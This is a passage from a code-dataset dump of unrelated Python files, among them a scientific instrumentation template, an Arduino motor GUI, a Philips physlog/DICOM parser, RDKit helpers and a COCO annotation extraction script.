date_fmt = '{:%m%d_%H%M}'.format(now)\n save_dir = config['save_dir'].format(date_fmt)\n vocab_file = config['vocab_file']\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--save_dir', help='Location of checkpoint files', default=save_dir)\n parser.add_argument('--vocab_file', help='Vocabulary file', default=vocab_file)\n parser.add_argument('--train_prefix', help='Prefix for train files', default=pingpong8000) # pingpong 8000 pairs\n # parser.add_argument('--train_prefix', help='Prefix for train files', default=filepattern) # sol/textat\n args = parser.parse_args()\n\n main(args)\n","sub_path":"bin/train_elmo.py","file_name":"train_elmo.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"194413123","text":"\"\"\"\r\nXLevel delocalized instrumentation class\r\nauthor: Valentyn Stadnytskyi\r\nCreated: November 2017\r\nLast modified: March 7 2019\r\n\"\"\"\r\n\r\n__version__ = '0.0.2'\r\n\r\nimport traceback\r\nimport psutil, os\r\nimport platform #https://stackoverflow.com/questions/110362/how-can-i-find-the-current-os-in-python\r\np = psutil.Process(os.getpid()) #source: https://psutil.readthedocs.io/en/release-2.2.1/\r\n\r\n\r\nfrom numpy import nan, mean, std, nanstd, asfarray, asarray, hstack, array, concatenate, delete, round, vstack, hstack, zeros, transpose, split, unique, nonzero, take, savetxt, min, max\r\nfrom serial import Serial\r\nfrom time import time, sleep\r\nimport sys\r\nimport os.path\r\nimport struct\r\nfrom pdb import pm\r\nfrom time import gmtime, strftime, time\r\nfrom logging import debug,info,warning,error\r\n\r\n\r\nfrom struct import pack, unpack\r\nfrom timeit import Timer, timeit\r\n\r\nfrom threading import Thread, Event, Timer, Condition\r\nfrom datetime import datetime\r\n\r\nclass GUITemlpate():\r\n def __init__(self):\r\n pass\r\n\r\n def initGUI(self):\r\n pass\r\n\r\nclass IndicatorsTemplate():\r\n\r\n def __init__(self, object):\r\n self.object = object\r\n self.list = []\r\n\r\n def keys(self):\r\n if len(self.list) == 0:\r\n self.list = list(self.get().keys())\r\n return self.list\r\n\r\n def get(self, value = None):\r\n \"\"\"\r\n returns a dictionary with all indicators. Every entry needs to\r\n be added manually. This helps to orginize what is avaiable to the outsie\r\n requestor.\r\n \"\"\"\r\n dic = {}\r\n dic[b'running'] = self.running\r\n\r\n return dic\r\n\r\n\r\n\r\n def get_running(self):\r\n \"\"\"\r\n default get_running function in the intrumentation library\r\n \"\"\"\r\n raise NotImplementedError\r\n #return response\r\n def set_running(self,value):\r\n \"\"\"\r\n default set_running function in the intrumentation library\r\n \"\"\"\r\n raise NotImplementedError\r\n running = property(get_running,set_running)\r\n\r\nclass ControlsTemplate():\r\n def __init__(self, object):\r\n self.list = []\r\n self.object = object\r\n\r\n def keys(self):\r\n if len(self.list) == 0:\r\n self.list = list(self.get().keys())\r\n return self.list\r\n\r\n\r\n def get(self):\r\n dic = {}\r\n dic[b'variable'] = 0\r\n return dic\r\n\r\n def set(self,new_controls = [{b'temp':False}]):\r\n for key in list(new_controls.keys()):\r\n setattr(self,key.decode(\"utf-8\"),new_controls[key])\r\n response = self.get()\r\n return response\r\n\r\n def get_variable(self):\r\n try:\r\n response = getattr(self.object,'variable')\r\n except:\r\n response = None #device.controls.running\r\n warning(traceback.format_exc())\r\n return response\r\n def set_variable(self,value):\r\n \"\"\"\r\n indicators cannot be set from outside. This method is used to set\r\n an indicator from other instances within this proccess.\r\n \"\"\"\r\n try:\r\n setattr(self.object,'variable',value)\r\n except:\r\n error(traceback.format_exc())\r\n variable = property(get_variable,set_variable)\r\n\r\n def get_task_queue(self):\r\n \"\"\"\r\n \"\"\"\r\n raise NotImplementedError\r\n\r\n def set_task_queue(self,value):\r\n \"\"\"\r\n \"\"\"\r\n raise NotImplementedError\r\n variable = property(get_variable,set_variable)\r\n\r\n\r\n\r\n\r\nclass XLevelTemplate():\r\n\r\n #inds = IndicatorsTemplate(self)\r\n #ctrls = ControlsTemplate(self)\r\n \"\"\"circular buffers dictionary contains information about all circular buffers and their type (Server, Client or Queue)\"\"\"\r\n circular_buffers = {}\r\n\r\n def __init__(self):\r\n #Thread.__init__(self)\r\n self.running = False\r\n #self.daemon = False # OK for main thread to exit even if instance is still running\r\n self.description = ''\r\n\r\n def first_time_setup(self):\r\n \"\"\"aborts current operation\r\n \"\"\"\r\n raise NotImplementedError\r\n\r\n\r\n def init(self, msg_in = None, client = None):\r\n \"\"\"\r\n does proper start of the XLevel code and can be called remoutely\r\n \"\"\"\r\n raise NotImplementedError\r\n response = {}\r\n response[b'flag'] = flag\r\n response[b'message'] = message\r\n response[b'error'] = err\r\n return response\r\n\r\n def abort(self,msg_in = None, client = None):\r\n \"\"\"aborts current operation\r\n \"\"\"\r\n raise NotImplementedError\r\n response = {}\r\n response[b'flag'] = flag\r\n response[b'message'] = message\r\n response[b'error'] = err\r\n return response\r\n\r\n def close(self,msg_in = None, client = None):\r\n \"\"\"aborts and completely stops the XLevel code\r\n \"\"\"\r\n raise NotImplementedError\r\n\r\n response = {}\r\n response[b'flag'] = flag\r\n response[b'message'] = message\r\n response[b'error'] = err\r\n return response\r\n\r\n\r\n\r\n def help(self,msg_in = None, client = None):\r\n \"\"\"\r\n returns help information about this XLevel program\r\n\r\n ####\r\n EXAMPLE:\r\n response = {}\r\n response[b'name'] = self.name\r\n response[b'controls'] = self.ctrls.get()\r\n response[b'indicators'] = self.inds.get()\r\n return response\r\n \"\"\"\r\n raise NotImplementedError\r\n\r\n response = {}\r\n response[b'flag'] = flag\r\n response[b'message'] = message\r\n response[b'error'] = err\r\n return response\r\n\r\n def snapshot(self,msg_in = None, client = None):\r\n \"\"\"\r\n returns snapshot of selected or all controls and indicators.\r\n see example below\r\n\r\n EXAMPLE:\r\n response = {}\r\n response[b'name'] = self.name\r\n response[b'controls'] = self.ctrls.get()\r\n response[b'indicators'] = self.inds.get()\r\n return response\r\n \"\"\"\r\n raise NotImplementedError\r\n\r\n response = {}\r\n response[b'flag'] = flag\r\n response[b'message'] = message\r\n response[b'error'] = err\r\n return response\r\n\r\n\r\n\r\n def controls(self,msg_in = {b'all':None}, client = None):\r\n \"\"\"\r\n return current control(controls) according to the input dictionary.\r\n example:\r\n the command->\r\n controls(msg = {b'controls':{'button1':None,'button2':None,'scanrate':2.0}})\r\n will set scanrate to 2.0 and return current setting for button1, button2 and scanrate\r\n \"\"\"\r\n debug('icarusSL controls command received: %r' % msg_in)\r\n response = {}\r\n msg_out = {}\r\n msg_out[b'message'] = {}\r\n err = ''\r\n flag = True\r\n if isinstance(msg_in,dict):\r\n if b'all' in list(msg_in.keys()):\r\n response = self.ctrls.get()\r\n ctrls_keys = self.ctrls.keys()\r\n else:\r\n ctrls_keys = self.ctrls.keys()\r\n for key in msg_in:\r\n if msg_in[key] is None:\r\n if key in ctrls_keys:\r\n response[key] = getattr(self.ctrls,key.decode(\"utf-8\"))\r\n else:\r\n response[key] = None\r\n err = \"control doesn't exist\"\r\n else:\r\n if key in ctrls_keys:\r\n setattr(self.ctrls,key.decode(\"utf-8\"),msg_in[key])\r\n response[key] = getattr(self.ctrls,key.decode(\"utf-8\")) #msg_in[key]\r\n else:\r\n response[key] = None\r\n err = \"control doesn't exist\"\r\n\r\n msg_out[b'flag'] = flag\r\n msg_out[b'message'][b'controls'] = response\r\n msg_out[b'error'] = err\r\n return msg_out\r\n\r\n def indicators(self, msg_in = {b'all':None}, client = None):\r\n \"\"\"\r\n this function takes 7us to execute probably because of hashtable,etc.\r\n If I call the function directly, I can execute it in 1 us\r\n \"\"\"\r\n debug('icarusSL indicators command received: %r' % msg_in)\r\n response = {}\r\n msg_out = {}\r\n msg_out[b'message'] = {}\r\n err = ''\r\n flag = True\r\n if isinstance(msg_in,dict):\r\n if b'all' in list(msg_in.keys()):\r\n response = self.inds.get()\r\n inds_keys = self.inds.keys()\r\n else:\r\n inds_keys = self.inds.keys()\r\n for key in msg_in:\r\n if msg_in[key] is None:\r\n\r\n if key in inds_keys:\r\n response[key] = getattr(self.inds,key.decode(\"utf-8\"))\r\n else:\r\n response[key] = None\r\n err = \"indicator doesn't exist\"\r\n else:\r\n if key in inds_keys:\r\n setattr(self.inds,key.decode(\"utf-8\"),msg_in[key])\r\n response[key] = getattr(self.inds,key.decode(\"utf-8\"))\r\n else:\r\n response[key] = None\r\n err = 'error'\r\n msg_out[b'flag'] = flag\r\n msg_out[b'message'][b'indicators'] = response\r\n msg_out[b'error'] = err\r\n return msg_out\r\n\r\n def notify_subscribers(self, msg_in = None, client = None):\r\n\r\n raise NotImplementedError\r\n\r\n def schedule(self, task_list = []):\r\n try:\r\n self.controls.set({b'task_queue':task_list})\r\n flag = True\r\n except:\r\n error(traceback.format_exc())\r\n flag = False\r\n\r\n response = {}\r\n response[b'flag'] = flag\r\n response[b'message'] = message\r\n response[b'error'] = err\r\n return response\r\n###\r\n ##########################################\r\n ### TASK SECTION: schedule, execute and abort\r\n #######################################\r\n \"\"\"\r\n This section is dedicated to functions that take care of\r\n the queue task consept and help to execute it.\r\n \"\"\"\r\n def schedule_task_queue(self, task_list = []):\r\n try:\r\n self.controls.set({b'task_queue':task_list})\r\n response = True\r\n except:\r\n error(traceback.format_exc())\r\n response = False\r\n return response\r\n\r\n def abort_task_queue(self):\r\n try:\r\n self.controls.set({b'task_queue':[]})\r\n response = True\r\n except:\r\n error(traceback.format_exc())\r\n response = False\r\n return response\r\n\r\n def execute_task_queue(self):\r\n if len(self.controls.task_queue) > 0:\r\n if self.controls.task_queue[0][0] - time() <=0:\r\n try:\r\n info('executing: %r, with flag %r' %\r\n (self.controls.task_queue[0],\r\n self.controls.task_queue[0][1] == b'change_offset'))\r\n if self.controls.task_queue[0][1] == b'change_offset' or self.controls.task_queue[0][1] == 'change_offset':\r\n\r\n self.change_offset(self.controls.task_queue[0][2][b'offset'])\r\n self.controls.task_queue.pop(0)\r\n except:\r\n pass#error(traceback.format_exc())\r\n flag = True\r\n else:\r\n flag = False\r\n else:\r\n flag = False\r\n return flag\r\n\r\n #########\r\n ### OTHER TASKS GO HERE. The XLevel can support multiple additional tasks\r\n ### which are more complicated than just return indicators or controls\r\n ########\r\n #def start(self): This is not needed for the class Thread\r\n # \"\"\"\"\"\"\r\n # raise NotImplementedError\r\n\r\n def stop(self):\r\n \"\"\"\"\"\"\r\n raise NotImplementedError\r\n\r\n def run_once(self):\r\n \"\"\"\"\"\"\r\n raise NotImplementedError\r\n\r\n def run(self):\r\n \"\"\"\"\"\"\r\n self.running = True\r\n while self.running:\r\n self.run_once()\r\n sleep(1)\r\n raise NotImplementedError\r\n\r\n\r\n def get_circular_buffer(self, msg_in = None, client = None):\r\n \"\"\"\r\n returns data from server circular buffer. Input, name of the circular buffer and global pointer.\r\n msg_in has to be a dictionary with circular buffer name\r\n the global_pointer sppecifies\r\n msg_in = {b'buffer_name':b'name',b'g_pointer':999}\r\n \"\"\"\r\n msg_out = {b'message':{}}\r\n flag = True\r\n err = ''\r\n\r\n in_buffer_name = msg_in[b'buffer_name']\r\n in_g_pointer = msg_in[b'g_pointer']\r\n if in_buffer_name in self.circular_buffers.keys():\r\n g_pointer = self.circular_buffers[in_buffer_name].g_pointer\r\n pointer = self.circular_buffers[in_buffer_name].pointer\r\n size = self.circular_buffers[in_buffer_name].size\r\n if in_g_pointer > g_pointer:\r\n data = self.circular_buffers[in_buffer_name].get_all()\r\n elif in_g_pointer < g_pointer:\r\n if g_pointer - in_g_pointer > size[1]:\r\n data = self.circular_buffers[in_buffer_name].get_all()\r\n else:\r\n N = g_pointer - in_g_pointer\r\n data = self.circular_buffers[in_buffer_name].get_N(N, M = pointer)\r\n else:\r\n data = None\r\n\r\n self.circular_buffers[in_buffer_name]\r\n\r\n msg_out[b'flag'] = flag\r\n msg_out[b'message'][b'data'] = data\r\n msg_out[b'message'][b'g_pointer'] = g_pointer\r\n msg_out[b'message'][b'pointer'] = pointer\r\n msg_out[b'error'] = err\r\n return msg_out\r\n\r\n def retrieve_values(self, msg_in = None , N = 2, order = 2, test_flag = None, client = None):\r\n \"\"\"\r\n msg_in = {b'buffer_name':b'name',b'time_vector' = asarray([ 1, 1, 1, 1, 1, 1, 1])}\r\n N - number of points to concider when obtain estimated value\r\n \"\"\"\r\n from numpy import argmin, argwhere, loadtxt, nanmax,\\\r\n nanmin, nan, nanargmin, nanargmax\r\n\r\n from XLI.auxiliary import sort_vector, expand_vector, get_estimate\r\n\r\n\r\n msg_out = {b'message':{}}\r\n flag = True\r\n err = ''\r\n out_array = None\r\n\r\n if isinstance(msg_in,dict):\r\n in_buffer_name = msg_in[b'buffer_name']\r\n in_vector = sort_vector(msg_in[b'time_vector'])\r\n if in_buffer_name in self.circular_buffers.keys():\r\n ndim = self.circular_buffers[in_buffer_name].size[0]\r\n out_array = expand_vector(in_vector, ndim = ndim)\r\n for i in range(len(in_vector)):\r\n for j in range(1,ndim):\r\n x = self.circular_buffers[in_buffer_name].get_all()[0,:]\r\n y = self.circular_buffers[in_buffer_name].get_all()[j,:]\r\n x_est = in_vector[i]\r\n if x_est > nanmax(x):\r\n y_est = nan\r\n err += 'requested value(%r) outside of the buffer boundaries. value > nanmax (%r)' % (x_est,nanmax(x))\r\n elif x_est < nanmin(x):\r\n y_est = nan\r\n err += 'requested value(%r) outside of the buffer boundaries. value < nanmin (%r)' % (x_est,nanmin(x))\r\n else:\r\n idx = nanargmin((x - x_est)**2)\r\n debug('idx = %r' %idx)\r\n if idx >= len(x)-2:\r\n N_after = 0\r\n N_before = N\r\n elif idx <= 1:\r\n N_after = N+1\r\n N_before = 0\r\n else:\r\n N_after = N+1\r\n N_before = N\r\n debug('N_after %r, N_before %r' %(N_after,N_before))\r\n\r\n y_est = get_estimate(x[idx-N_before:idx+N_after],y[idx-N_before:idx+N_after],x_est, order = order)\r\n\r\n out_array[j,i] = y_est\r\n\r\n else:\r\n err = \"buffer doesn't exist\"\r\n out_vector = msg_in[b'time_vector']\r\n msg_out[b'flag'] = flag\r\n msg_out[b'message'][b'out_array'] = out_array\r\n msg_out[b'error'] = err\r\n return msg_out\r\n########################################\r\n### Threading Section ###\r\n####################################\r\n\r\n###BINDING OF A SERVER MODULE WITH XLevel EXAMPLE\r\n\r\n##from server_LL import server\r\n##server.init_server(name = 'icarus-server')\r\n##server.commands[b'init'] = icarus_SL.init\r\n###server.commands[b'help'] = device.help\r\n###server.commands[b'snapshot'] = device.snapshot\r\n###server.commands[b'close'] = device.close\r\n##server.commands[b'controls'] = icarus_SL.controls\r\n##server.commands[b'indicators'] = icarus_SL.indicators\r\n###server.commands[b'retrieve_values'] = device.retrieve_values\r\n##server.commands[b'subscribe'] = server.subscribe\r\n###server.commands[b'buffers_update'] = device.buffers_update\r\n###server.commands[b'dump_buffers'] = icarus_SL.subscribe\r\n\r\n\r\n\r\nif __name__ == \"__main__\": #for testing\r\n from tempfile import gettempdir\r\n import logging\r\n #logging.basicConfig(#filename=gettempdir()+'/icarus_SL.log',\r\n # level=logging.INFO, format=\"%(asctime)s %(levelname)s: %(message)s\")\r\n","sub_path":"ubcs_auxiliary/trash/XLI/hierarchy_instrumentation.py","file_name":"hierarchy_instrumentation.py","file_ext":"py","file_size_in_byte":17563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"216206418","text":"#Enviando ordenes al Arduino mediante comunicacion Serial para mover un motor\n#librerias\nimport serial\nimport tkinter as tk\n\n#Objetos\ns = serial.Serial(\"/dev/ttyACM0\",9600)\n\n#Funciones\ndef uno():\n dato = \"1\"\n s.write(dato.encode())\ndef dos():\n dato = \"2\"\n s.write(dato.encode())\ndef tres():\n dato = \"3\"\n s.write(dato.encode())\ndef cuatro():\n dato = \"4\"\n s.write(dato.encode())\n\n#Cuerpo del Programa\nw = tk.Tk()\nw.title(\"Manipulando Motor\")\n\nf = tk.Frame(w).grid(row=0,column=0)\n\nlb1 = tk.Label(f,text=\"Selecciona una Opción\").grid(row=0,column=0,columnspan=4)\n\nbtn1 = tk.Button(f,text=\"0 Grados\",command=uno,width=20).grid(row=1,column=0)\nbtn2 = tk.Button(f,text=\"90 Grados\",command=dos,width=20).grid(row=1,column=1)\nbtn3 = tk.Button(f,text=\"180 Grados\",command=tres,width=20).grid(row=1,column=2)\nbtn4 = tk.Button(f,text=\"Giro Completo\",command=cuatro,width=20).grid(row=1,column=3)\n \nw.mainloop()\ns.close()\n","sub_path":"motor/motor.py","file_name":"motor.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"459314287","text":"s1,s2,n=input().split()\nd={}\nc=0\nfor i in range(len(s1)):\n if(s1[i] not in d.keys()):\n d[s1[i]]=s2[i]\n else:\n if(d[s1[i]]==s2[i]):\n continue\n else:\n c+=1\nif(c==n or c==0):\n print(\"yes\")\nelse:\n print(\"no\")\n","sub_path":"isomorphic_except_count.py","file_name":"isomorphic_except_count.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"324841288","text":"#!/usr/bin/env python\n#\n# Load a Philips scan physlog file, trim to the exact scan time, and split into separate \n# cardiac and respiratory signals. Save to AFNI .1D format. \n\n# EDITED 26 FEB 2020 for new VAT calculation\n\nimport os\nimport sys\nimport pandas\nimport pydicom\nimport datetime\n\n\n###########################################################################################\n# Get inputs\nif len(sys.argv) is not 4:\n print('Usage:')\n print(sys.argv[0] + ' physlog_file physlog_Hz dicom_file')\n exit()\n\nphyslog_file = sys.argv[1]\nphyslog_Hz = sys.argv[2]\ndicom_file = sys.argv[3]\nprint('Physlog file: ' + physlog_file)\nprint('Physlog sampling rate in Hz: ' + physlog_Hz)\nprint('DICOM file: ' + dicom_file)\nphyslog_Hz = float(physlog_Hz)\n\n\n###########################################################################################\n# Get acquisition duration from the DICOM\nprint('Getting volume acquisition time from %s' % dicom_file)\nds = pydicom.dcmread(dicom_file)\n\n\n# (5200,9230) PerFrameFunctionalGroupsSequence\n# (2005,140f) Private field\n# (2005,10a0) Private field - frame start time in sec\n# (0020,9111) FrameContentSequence\n# (0018,9074) FrameAcquisitionDateTime\n# (0020,9157) DimensionIndexValues (0=irrelevant,1=slice,2=volume)\n\n# Acquisition time and dim index for each frame\nPerFrameFunctionalGroupsSequence = ds[0x5200,0x9230]\nFrameAcquisitionDateTime = [x[0x0020,0x9111][0][0x0018,0x9074] \n for x in PerFrameFunctionalGroupsSequence]\nFrameStartTimeSec = [x[0x2005,0x140f][0][0x2005,0x10a0] \n for x in PerFrameFunctionalGroupsSequence]\nDimensionIndexValues1 = [x[0x0020,0x9111][0][0x0020,0x9157][1] \n for x in PerFrameFunctionalGroupsSequence]\nDimensionIndexValues2 = [x[0x0020,0x9111][0][0x0020,0x9157][2] \n for x in PerFrameFunctionalGroupsSequence]\n\n# Boolean - is this element the min or max index of the entire bunch?\nmin1 = [x==min(DimensionIndexValues1) for x in DimensionIndexValues1]\nmin2 = [x==min(DimensionIndexValues2) for x in DimensionIndexValues2]\nmax2 = [x==max(DimensionIndexValues2) for x in DimensionIndexValues2]\n\n# Index value of min slice + min volume, and min slice + max volume\n# (The first and last volumes of the time series)\nminloc = [i for i,xy in enumerate(zip(min1,min2)) if xy[0] and xy[1]][0]\nmaxloc = [i for i,xy in enumerate(zip(min1,max2)) if xy[0] and xy[1]][0]\n\n# Starttime for first and last volumes, in sec, by private field\nmindtP = FrameStartTimeSec[ minloc ].value\nmaxdtP = FrameStartTimeSec[ maxloc ].value\n\n# Datetime for first and last volumes from frametime, converted to datetime\nmindtstr = FrameAcquisitionDateTime[ minloc ]\nmaxdtstr = FrameAcquisitionDateTime[ maxloc ]\nmindtD = datetime.datetime.strptime(mindtstr.value,'%Y%m%d%H%M%S.%f')\nmaxdtD = datetime.datetime.strptime(maxdtstr.value,'%Y%m%d%H%M%S.%f')\n\n# Compute volume acquisition time both ways. Note, totaltime is from beginning \n# of first vol to beginning of last vol\ntotaltimeP = maxdtP - mindtP\ntotaltimeD = (maxdtD-mindtD).total_seconds()\nnvols = max(DimensionIndexValues2) - min(DimensionIndexValues2)\n\nprint('VAT from frame timestamps: %f' % (totaltimeD/nvols) )\nprint('VAT from private field: %f' % (totaltimeP/nvols) )\n\n# Use the private field to compute VAT (probably more accurate)\nvat = totaltimeP / nvols\n\n# Save voltime in sec to file\nprint('Saving estimated voltime %f in volume_acquisition_time.txt' % (vat))\nwith open('vat.txt','w') as f:\n f.write( '%f' % (vat) )\n\n\n\n# NEW NVOLS\n# Number of vols from dicom\n# NumberOfTemporalPositions from first frame (Philips private field)\n# PerFrameFunctionalGroupsSequence[0].Private_2005_140f[0].NumberOfTemporalPositions\n# Does not include dummy scans\nds = pydicom.dcmread(dicom_file)\nPerFrameFunctionalGroupsSequence = ds[0x5200,0x9230]\nnvols = int( PerFrameFunctionalGroupsSequence[0][0x2005,0x140f][0][0x0020,0x0105].value )\nprint('Number of volumes: %d' % nvols)\n\n\n\n\n\n###########################################################################################\n# Load the physlog file, trim to match scan length, save card/resp in AFNI .1D format\nphyslog = pandas.read_csv(physlog_file,delim_whitespace=True,skiprows=6,header=None)\ncard = physlog.iloc[:,4]\nresp = physlog.iloc[:,5]\nmark = physlog.iloc[:,9]\nlastmark = int(max(mark[mark==20].index))\nrowsneeded = int(round(nvols * vat * physlog_Hz))\nfirstmark = int(lastmark - rowsneeded + 1)\nprint('Keeping %d physlog points from %d to %d' % (rowsneeded,firstmark,lastmark+1))\ncard = card[firstmark:lastmark+1]\nresp = resp[firstmark:lastmark+1]\ncard.to_csv('physlog_cardiac.csv',header=False,index=False)\nresp.to_csv('physlog_respiratory.csv',header=False,index=False)","sub_path":"src/parse_physlog.py","file_name":"parse_physlog.py","file_ext":"py","file_size_in_byte":4697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"90857745","text":"import uuid\nfrom pathlib import Path\nfrom logging import DEBUG, Formatter, StreamHandler, getLogger\n\nfrom rdkit import Chem\n\n\ndef get_logger():\n logger = getLogger(str(uuid.uuid4()))\n logger.setLevel(DEBUG)\n stream_handler = StreamHandler()\n handler_format = Formatter(\n '(%(levelname)s)[%(asctime)s]\\n%(message)s')\n stream_handler.setFormatter(handler_format)\n logger.addHandler(stream_handler)\n return logger\n\n\ndef to_sdf_by_confIds(mol, confIds, filename):\n writer = Chem.SDWriter(filename)\n for confID in confIds:\n writer.write(mol, confId=confID)\n writer.close()\n\n\ndef from_multisdf(filepath):\n if not Path(filepath).exists():\n raise FileNotFoundError(f\"{str(filepath)}\")\n\n suppl = Chem.SDMolSupplier(filepath)\n mols = [mol for mol in suppl if mol is not None]\n mols = list(map(Chem.AddHs, mols))\n return mols\n","sub_path":"qmkit/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"492273209","text":"# %matplotlib inline\nfrom pycocotools.coco import COCO\nimport numpy as np\nimport skimage.io as io\nimport matplotlib.pyplot as plt\nimport pylab\n#################################################\nimport cv2\n# import pandas as pd\ndef showNimages(imgIds, annFile, imageFile, resultFile):\n \"\"\"\n :param imageidFile: 要查看的图片imageid,存储一列在csv文件里 (目前设计的imageid需要为6位数,如果少于6位数,可以在前面加多个0)\n :param annFile:使用的标注文件\n :param imageFile:要读取的image所在文件夹\n :param resultFile:画了标注之后的image存储文件夹\n :return:\n \"\"\"\n # data = pd.read_csv(imageidFile)\n # list = data.values.tolist()\n # str_image_id = [] # 存储的是要提取图片id\n # for i in range(len(imgIds)):\n # str_tmp =''\n # for j in range(6-len(str(imgIds[i]))):\n # str_tmp +='0'\n # str_tmp += str(imgIds[i])\n # str_image_id.append(str_tmp)\n # print(str_image_id)\n # print(len(str_image_id))\n coco = COCO(annFile)\n # Anns_txt = open(resultFile+'AnnsCat.txt', 'a')\n Anns_txt = open(resultFile + 'testSheep.txt', 'a')\n dogId = coco.getCatIds(['dog'])\n catId = coco.getCatIds(['cat'])\n sheepId = coco.getCatIds(['sheep'])\n\n for i in range(len(imgIds)):\n str_image_id = ''\n for j in range(6-len(str(imgIds[i]))):\n str_image_id +='0'\n str_image_id += str(imgIds[i])\n img_tmp_str = '000000' + str_image_id + '.jpg'\n image_s = cv2.imread(imageFile + '000000' + str_image_id + '.jpg')\n image = image_s\n shape = image.shape\n (imgH,imgW,imgC) = shape\n img_anns_tmp = {}\n annIds = coco.getAnnIds(imgIds=imgIds[i], catIds=dogId)\n class_id = 0\n dog_anns = coco.loadAnns(annIds)\n img_anns_tmp[class_id]=dog_anns\n annIds = coco.getAnnIds(imgIds=imgIds[i], catIds=catId)\n class_id = 1\n cat_anns = coco.loadAnns(annIds)\n img_anns_tmp[class_id] = cat_anns\n annIds = coco.getAnnIds(imgIds=imgIds[i], catIds=sheepId)\n class_id = 7\n sheep_anns = coco.loadAnns(annIds)\n img_anns_tmp[class_id] = sheep_anns\n\n # for n in range(len(anns)):\n # x, y, w, h = anns[n]['bbox']\n # x, y, w, h = int(x), int(y), int(w), int(h)\n # # print(x, y, w, h)\n # # cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255))\n # x_min = round(float(x)/imgW,7); y_min= round(float(y)/imgH,7)\n # x_max = round(float(x + w)/imgW,7); y_max = round(float(y + h)/imgH,7)\n # img_tmp_str += ' ' + str(x_min) + ',' + str(y_min) + ',' + str(x_max) + ',' + str(y_max) + ',' + str(class_id)\n # annIds = coco.getAnnIds(imgIds=imgIds[i], catIds=catId)\n for key in img_anns_tmp.keys():\n class_id = key\n anns = img_anns_tmp[key]\n for n in range(len(anns)):\n x, y, w, h = anns[n]['bbox']\n x, y, w, h = int(x), int(y), int(w), int(h)\n # print(x, y, w, h)\n # cv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0))\n #分数\n # x_min = round(float(x) / imgW, 7)\n # y_min = round(float(y) / imgH, 7)\n # x_max = round(float(x + w) / imgW, 7)\n # y_max = round(float(y + h) / imgH, 7)\n #整数\n x_min = x; y_min = y; x_max = x + w; y_max = y + h\n img_tmp_str += ' ' + str(x_min) + ',' + str(y_min) + ',' + str(x_max) + ',' + str(y_max) + ',' + str(\n class_id)\n Anns_txt.write(img_tmp_str + '\\n')\n # class_id = 1\n # anns = coco.loadAnns(annIds)\n # for n in range(len(anns)):\n # x, y, w, h = anns[n]['bbox']\n # x, y, w, h = int(x), int(y), int(w), int(h)\n # # print(x, y, w, h)\n # # cv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0))\n # x_min = round(float(x)/imgW,7); y_min= round(float(y)/imgH,7)\n # x_max = round(float(x + w)/imgW,7); y_max = round(float(y + h)/imgH,7)\n # img_tmp_str += ' ' + str(x_min) + ',' + str(y_min) + ',' + str(x_max) + ',' + str(y_max) + ',' + str(class_id)\n #\n # Anns_txt.write(img_tmp_str + '\\n')\n img_tmp_str = ''\n # cv2.imwrite(resultFile + 'CatImg/000000' + str_image_id + '.jpg', image)\n cv2.imwrite(resultFile + 'testSheep/000000' + str_image_id + '.jpg', image)\n Anns_txt.close()\n print(\"生成图片存在{}\".format(resultFile))\n######################################################\n\npylab.rcParams['figure.figsize'] = (8.0, 10.0)\ndataDir='/media/we/work/TrainData/coco'\ndataType='train2017'\ndataType='val2017'\nannFile='{}/annotations/instances_{}.json'.format(dataDir,dataType)\n\nimageidFile = '/Desktop/myimage_id.csv'\nimageFile = dataDir+'/'+dataType+'/'\nresultFile = '/media/we/Seagate Expansion Drive/狗数据集/CoCo/'\n\n# initialize COCO api for instance annotations\ncoco=COCO(annFile)\n\ntotal_imgIds = coco.getImgIds()\n# 获取'狗'的标签ID\ncatIds = coco.getCatIds(['sheep'])\n\n# 在所有图像里面找到狗的图像的ID号\nimgIds = coco.getImgIds(total_imgIds, catIds)\n# imgIds22 = coco.getImgIds(total_imgIds, coco.getCatIds(['dog','cat']))\n# imgIds = imgIds -imgIds22\nimgAnnIds = coco.getAnnIds(imgIds, catIds)\n# 根据找到的ID号找到图像信息\nimg = coco.loadImgs(imgIds)\nAnns = coco.loadAnns(imgAnnIds)\n# 根据图像信息加载一张图像\nI = io.imread('%s/%s/%s' % (dataDir, dataType, img[1]['file_name']))\n\nfor Ann in Anns:\n if Ann['image_id']==img[1]['id']:\n bbox = Ann['bbox']\n# 用scikit-image显示出来\nplt.axis('off')\nplt.imshow(I)\nplt.show()\n\nshowNimages(imgIds, annFile, imageFile, resultFile)\n#\n#\n#\n# # display COCO categories and supercategories\n# cats = coco.loadCats(coco.getCatIds(['dog']))\n# Anns = coco.loadAnns(coco.getAnnIds())\n# nms=[cat['name'] for cat in cats]\n# category_id=set([Ann['category_id'] for Ann in Anns])\n# print('COCO categories: \\n{}\\n'.format(' '.join(nms)))\n#\n# # nms = set([cat['supercategory'] for cat in cats])\n# # print('COCO supercategories: \\n{}'.format(' '.join(nms)))\n# # get all images containing given categories, select one at random\n# catIds = coco.getCatIds(catNms=['person','dog','skateboard']);\n# imgIds = coco.getImgIds(catIds=catIds );\n# imgIds = coco.getImgIds(imgIds = [324158])\n# img = coco.loadImgs(imgIds[np.random.randint(0,len(imgIds))])[0]\n# # load and display image\n# I = io.imread('%s/images/%s/%s'%(dataDir,dataType,img['file_name']))\n# # use url to load image\n# # I = io.imread(img['coco_url'])\n# plt.axis('off')\n# plt.imshow(I)\n# plt.show()\n# # load and display instance annotations\n# plt.imshow(I); plt.axis('off')\n# annIds = coco.getAnnIds(imgIds=img['id'], catIds=catIds, iscrowd=None)\n# anns = coco.loadAnns(annIds)\n# 